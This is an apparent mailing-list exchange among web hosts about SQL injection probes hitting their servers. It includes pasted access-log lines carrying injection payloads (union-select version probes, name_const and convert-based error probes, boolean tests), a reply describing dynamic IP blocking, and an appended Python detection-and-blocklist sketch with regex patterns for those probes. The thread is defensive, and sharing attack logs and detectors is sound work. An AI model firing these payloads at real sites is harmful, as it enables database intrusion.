<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<p>Hi Mik,</p>
<p>I don't host others' sites these days but I do keep a close eye
on suspicious requests to my pastebin site (dpaste.com) and
maintain a blocklist. Out of curiosity I looked for the IPs you
shared; none of them are currently on my list. No SQL injection
attempts either (though lots of 404s looking for wp-login.php).<br>
</p>
<p>Because of the whack-a-mole syndrome you identify, last year I
moved to a dynamic blocking setup. I have automation to detect and
block bad-behaving IPs; then I age them out if they go three days
without reoffending.</p>
<p>The list is typically 1000 to 2000 IPs long.<br>
</p>
<p>I've had good results from this, and zero complaints from users
whose IP happened to have been previously used by a
botnet/spammer.<br>
</p>
<p>Good luck!</p>
<p>P<br>
</p>
<div class="moz-cite-prefix">On 2/15/21 2:53 PM, Michael Muller via
Hidden-discuss wrote:<br>
</div>
<blockquote type="cite"
cite="mid:26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com">
<p><font face="Calibri">Hey HT web hosts out there,</font></p>
<p><font face="Calibri">Due to recent hacking attempts against our
servers, I have installed an IP Tracker that tracks and blocks
any aggressive activity.</font></p>
<p><font face="Calibri">Starting late last week we've found a
growing number of IP numbers that appear to be attempting SQL
Injection attacks. I've pasted a few snippets from our logs,
below.</font></p>
<p><font face="Calibri">Anyone else seeing this kind of activity
on their servers? Every time I block an IP number they move to
another IP number. The list of IPs hitting us is growing, and
moving across multiple hosts.<br>
</font></p>
<p><font face="Calibri">So far, I've contacted four different
server hosts about the traffic coming from their servers. By
far the most "infected" appears to be the Unified Layer family
of hosting companies, which includes HostGator Mexico,
webhostbox Bigrock India, and a number of others. Additional
sources of the attacks are Hetzner.com from Germany; Ozkula
from Turkey; and ColoCrossing from Buffalo NY. I'm sure more
will be added as the days go on.<br>
</font></p>
<p><font face="Calibri">Stay safe.</font></p>
<p><font face="Calibri">Mik<br>
</font></p>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A
94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1
94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
</font></font></pre>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1
37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
</font></font></pre>
<pre class="moz-signature" cols="72"><font face="Courier New, Courier, monospace"><font size="-1">192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing
192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1
192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1
192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x</font></font>
</pre>
<pre class="moz-signature" cols="72">---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
<a class="moz-txt-link-freetext" href="http://MontagueWebWorks.com" moz-do-not-send="true">http://MontagueWebWorks.com</a>
Powered by ROCKETFUSION</pre>
</blockquote>
<pre class="moz-signature" cols="72">--
Paul Bissex, software engineer
<a class="moz-txt-link-freetext" href="http://paulbissex.com/">http://paulbissex.com/</a>
Greenfield MA 01301 USA
413-230-9451</pre>
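<p>Added example, not code from either poster: a sketch of the detect, block and age-out approach described in the reply, run over lines in the layout of the quoted log snippets. The names <code>Blocklist</code> and <code>is_suspicious</code>, the regex heuristics, the sample hosts and documentation-range IPs, and the caller-supplied timestamps (the quoted logs show only time of day) are all assumptions.</p>

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Heuristic patterns for the probes visible in the quoted logs (assumed, not exhaustive).
SQLI = re.compile(
    r"union\s+select|name_const\s*\(|convert\s*\(\s*int|\b(?:and|or)\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)
MAX_AGE = timedelta(days=3)  # age out after three days without reoffending

def is_suspicious(line):
    """True if the request part of an 'ip time host request' line looks like SQLi."""
    parts = line.split(None, 3)
    # Decode %xx escapes first so encoded spaces and quotes cannot hide keywords.
    return len(parts) == 4 and bool(SQLI.search(unquote(parts[3])))

class Blocklist:
    def __init__(self):
        self.last_offense = {}  # ip: time of most recent offense

    def observe(self, when, line):
        """Record an offense if the line is suspicious; return whether it was."""
        if not is_suspicious(line):
            return False
        self.last_offense[line.split(None, 1)[0]] = when  # reoffending resets the clock
        return True

    def expire(self, now):
        """Remove and return IPs whose last offense is older than MAX_AGE."""
        aged = sorted(ip for ip, t in self.last_offense.items() if now - t > MAX_AGE)
        for ip in aged:
            del self.last_offense[ip]
        return aged

T0 = datetime(2021, 2, 15, 14, 58, 55)
SAMPLE = [  # constructed lines in the quoted log layout; IPs are documentation addresses
    (T0, "203.0.113.7 14:58:55 example.org /z term=Licensing"),
    (T0, "203.0.113.7 14:58:57 example.org /z term=Licensing%20AND%201=1"),
    (T0, "198.51.100.9 08:14:42 example.org /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1"),
    (T0 + timedelta(days=2), "203.0.113.7 09:00:00 example.org /z term=0%20AND%201=1"),
]

def demo():
    """Feed the sample, then expire four days after T0: only the repeat offender stays."""
    bl = Blocklist()
    for when, line in SAMPLE:
        bl.observe(when, line)
    return bl.expire(T0 + timedelta(days=4)), sorted(bl.last_offense)
```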
</body>
</html>